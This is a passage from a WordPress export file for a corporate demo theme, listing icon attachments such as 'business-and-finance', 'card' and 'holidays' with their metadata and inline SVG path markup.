		<pubDate>Wed, 09 Sep 2020 07:06:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/business-and-finance.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>631</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:06:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:06:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-and-finance]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/business-and-finance.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/business-and-finance.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>business-and-finance-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/elements__trashed/business-and-finance-1/</link>
		<pubDate>Wed, 09 Sep 2020 07:26:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/business-and-finance-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>637</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:26:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:26:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-and-finance-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/business-and-finance-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/business-and-finance-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>card</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/elements__trashed/card/</link>
		<pubDate>Wed, 09 Sep 2020 07:26:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/card.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>638</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:26:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:26:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[card]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/card.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/card.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512.01 512.01"><g><path d="m479.659 248.51h-72.427l27.649-15.963c15.448-8.919 20.76-28.743 11.841-44.191l-85.052-147.317-1.922-3.329-12.424-21.52c-4.32-7.483-11.297-12.836-19.644-15.073-8.349-2.238-17.065-1.088-24.548 3.232l-154.14 88.993c-3.587 2.071-4.816 6.658-2.745 10.245s6.658 4.817 10.245 2.745l154.14-88.993c8.284-4.782 18.917-1.935 23.701 6.351l8.675 15.025-316.994 183.016-8.675-15.026c-2.317-4.013-2.933-8.689-1.733-13.166 1.2-4.476 4.07-8.217 8.084-10.535l105.905-61.144c3.587-2.071 4.816-6.658 2.745-10.245s-6.658-4.817-10.245-2.745l-105.906 61.145c-7.483 4.32-12.836 11.296-15.073 19.643-2.236 8.346-1.089 17.064 3.232 24.547l12.423 21.517c.001.001.001.003.002.004l12.425 21.521 74.55 129.125c2.93 5.074 7.173 9.228 12.228 12.056v81.232c0 17.838 14.512 32.35 32.35 32.35h226.715c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-226.714c-9.567 0-17.35-7.783-17.35-17.35v-85.724c.004-.085-.001-.168 0-.253v-112.823c0-9.567 7.783-17.35 17.35-17.35h230.9c.008 0 .015.001.023.001.007 0 .015-.001.023-.001h100.387c9.567 0 17.351 7.783 17.351 17.35v198.8c0 9.567-7.783 17.35-17.351 17.35h-74.616c-4.143 0-7.5 3.358-7.5 7.5s3.357 7.5 7.5 7.5h74.616c17.838 0 32.351-14.512 32.351-32.35v-198.8c-.001-17.838-14.514-32.35-32.352-32.35zm-129.151-196.805 2.637 4.568 6.429 11.136-316.993 183.017-9.067-15.704zm-234.531 229.155v96.692l-65.897-114.136 316.994-183.017 66.658 115.456c4.783 8.285 1.934 18.917-6.351 23.701l-50.149 28.954h-228.905c-17.838 0-32.35 14.512-32.35 32.35z"></path><path d="m389.037 154.707c-2.07-3.587-6.66-4.816-10.245-2.745l-71.736 41.417c-3.587 2.071-4.816 6.658-2.745 10.245 1.389 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006l71.736-41.417c3.587-2.071 4.816-6.658 2.745-10.245z"></path><path d="m402.858 193.646c3.587-2.071 4.816-6.658 2.745-10.245s-6.66-4.816-10.245-2.745l-28.694 16.567c-3.587 2.071-4.816 6.658-2.745 10.245 1.39 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006z"></path><path d="m363.409 346.343h83.4c8.547 0 15.5-6.953 15.5-15.5v-17.133c0-8.547-6.953-15.5-15.5-15.5h-83.4c-8.547 0-15.5 6.953-15.5 15.5v17.133c0 8.547 6.953 15.5 15.5 15.5zm-.5-32.633c0-.276.225-.5.5-.5h83.4c.275 0 .5.224.5.5v17.133c0 .276-.225.5-.5.5h-83.4c-.275 0-.5-.224-.5-.5z"></path><path d="m246.943 347.41v-50.267c0-8.547-6.953-15.5-15.5-15.5h-66.833c-8.547 0-15.5 6.953-15.5 15.5v50.267c0 8.547 6.953 15.5 15.5 15.5h66.833c8.547 0 15.5-6.953 15.5-15.5zm-15-50.267v17.633h-26.417v-18.133h25.917c.276 0 .5.224.5.5zm-67.333-.5h25.917v18.133h-26.417v-17.633c0-.276.224-.5.5-.5zm-.5 50.767v-17.633h67.833v17.633c0 .276-.224.5-.5.5h-66.833c-.276 0-.5-.224-.5-.5z"></path><path d="m156.61 430.743c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5h33.133c4.142 0 7.5-3.358 7.5-7.5s-3.358-7.5-7.5-7.5z"></path><path d="m222.876 445.743h99.4c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-99.4c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path><path d="m355.409 445.743h49.7c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-49.7c-4.143 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>holidays</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/elements__trashed/holidays/</link>
		<pubDate>Wed, 09 Sep 2020 07:33:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/holidays.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>643</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:33:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:33:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[holidays]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/holidays.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/holidays.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bars-chart</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/elements__trashed/bars-chart/</link>
		<pubDate>Wed, 09 Sep 2020 07:44:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bars-chart.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>648</wp:post_id>
